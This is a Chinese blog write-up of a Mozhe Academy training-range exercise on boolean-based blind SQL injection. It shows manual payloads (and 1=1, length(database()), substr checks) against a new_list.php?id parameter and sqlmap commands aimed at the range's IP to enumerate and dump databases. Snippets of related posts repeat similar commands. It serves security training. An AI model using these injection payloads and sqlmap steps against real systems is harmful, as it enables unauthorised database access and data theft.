墨者学院-SQL注入漏洞测试(布尔盲注)

最新推荐文章于 2025-05-17 05:09:16 发布
原创 最新推荐文章于 2025-05-17 05:09:16 发布 · 2.7k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何进行SQL注入漏洞测试,特别是布尔盲注的方法。通过逐个步骤展示在靶场中寻找注入点,判断数据库名、表名及列名,并最终利用sqlmap工具提取敏感信息的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入漏洞测试(布尔盲注)

难易程度:★
题目类型:SQL注入
使用工具:FireFox浏览器、kali

1.打开靶场,寻找注入点。
点击公告/new_list.php?id=1,找到注入点。

2.输入id=1’ and 1=1,返回空页面
在这里插入图片描述
输入id=1 and 1=1,返回正常页面。
在这里插入图片描述
3.判断数据库名字的长度,输入id=1 and length(database())=1,返回空白页,证明不是1,一个一个试确定长度为10。

4.判断数据库的名字,输入id=1 and substr(database(),1,1)=‘a’ --+,返回空白页,最后第一个确定为s,一次类推,最后确定数据库名字为stormgroup。
在这里插入图片描述
5.发现这样一个一个试,太难受了。默默打开了kali,使用sqlmap。
输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db
数据库名为stormgroup

最低0.47元/天 解锁文章

200万优质内容无限畅学
JimWu95
关注
SQL注入漏洞测试(布尔盲注)
qq_52718293的博客
11-30 5389
一.sqlmap 1.查看库名(测试后发现有5个) python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 --dbs 2.查看表明 python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 -D stormgroup --tables 3.查看字段名 python sqlmap.py -u http://219.153.49.228:44485/new_
墨者靶场 SQL注入漏洞测试(布尔盲注)
曹振国的博客
06-14 5349
初级 布尔盲注一、查看页面源代码,发现注入点二、sqlmap一把梭三、登录查看到key 一、查看页面源代码,发现注入点 二、sqlmap一把梭 ┌──(root????caozhenguo)-[~/桌面] └─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 查询库 ┌──(root????caozhenguo)-[~/桌面] └─# sqlmap -u http://219.153.49.228:40972/new_list.php?
SQL注入—详解(3)布尔盲注
最新发布
2402_84408069的博客
05-17 1159
布尔盲注是一种SQL注入技术,适用于应用程序不返回数据库错误或查询结果的情况。攻击者通过构造SQL语句,根据应用程序返回的布尔值(真/假)推断数据库信息。布尔盲注的特点包括无显式错误信息、无直接查询结果、依赖页面响应差异以及逐字符猜测数据。常见技术包括基于长度、字符、ASCII码和时间的盲注。攻击步骤包括确认注入点、确定盲注类型、获取数据库信息和使用自动化工具。防御措施包括参数化查询、最小权限原则、输入验证、错误处理、Web应用防火墙和定期安全测试。通过DVWA靶场复现布尔盲注,可以进一步理解其原理和应用。
02#墨者靶场-SQL注入漏洞测试(布尔盲注)
shy的博客
11-15 827
墨者学习 By/shy014 1.进入靶场环境发现后台管理页面,尝试弱口令和万能密码失败,抓包查看登陆处也没有发现注入漏洞。 2.仔细查看该页面,发现一个新的链接,点击跳转,发现可能存在注入...
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4598
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者学院-SQL注入漏洞测试布尔盲注
weixin_42939822的博客
03-20 4480
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 568
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 900
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
[墨者学院]SQL注入漏洞测试(布尔盲注)
m0_60945802的博客
03-22 4310
墨者学院SQL注入漏洞测试(布尔盲注)
没事我溜达
03-18 2214
靶场地址:SQL注入漏洞测试(布尔盲注)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 打开靶场 我们先判断注入点,通过and 1 = 1和and 1 = 2来判断 发现页面存在注入点,且是数字型注入,但是id不为1时则没有任何回显,那我们只能判定是布尔盲注。 构造语句来证明我的想法 and length(database())= 10 发现页面在数据库长度为10的条件下回显正常,那么就证明了该点确实是存在布尔盲注的,为了节约时间我们放到sqlma...
0x00.SQL注入漏洞测试(布尔盲注)
qq_31679787的博客
09-09 250
初始界面; 尝试进行post注入,但是发现不行; 但是发现下方的通知栏会跳转,跳转后的页面存在注入; 爆库名; 爆表名; 先爆member表的列名; 爆库; 通过md5解密得到密码; 登录后得到key; ...
刷题笔记:SQL注入漏洞测试(布尔盲注)
m0_67399862的博客
05-18 221
由and语句可看到两句都为真时页面正常,一真一假时,页面报错 用order by语句查字段数 发现4的时候,页面正常,当5的时候,页面报错 所以字段数为4 用union select语句进行联合查询时,发现1,2,3,4语句并没有拼接上去 在1前面加了个-号,仍然没有信息回显,又想到前面SQL语句执行成功和错误会返回两个不同的页面,所以考虑布尔盲注。 用and length(database())>=num语句来判断数据库长度,发现数据库的长度为10 ...
墨者学院03 SQL注入漏洞测试(布尔盲注)
weixin_42789937的博客
01-24 567
墨者学院03 SQL注入漏洞测试(布尔盲注),脚本小子的SQL注入实战~
墨者SQL注入漏洞测试(布尔盲注)
12-27
### SQL 注入漏洞测试中的布尔盲注方法 布尔盲注是一种通过观察应用程序响应来推断查询结果的技术。攻击者发送特定的输入给服务器,如果返回的结果满足某些条件,则表示注入成功。 #### 原理说明 在布尔盲注中,...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值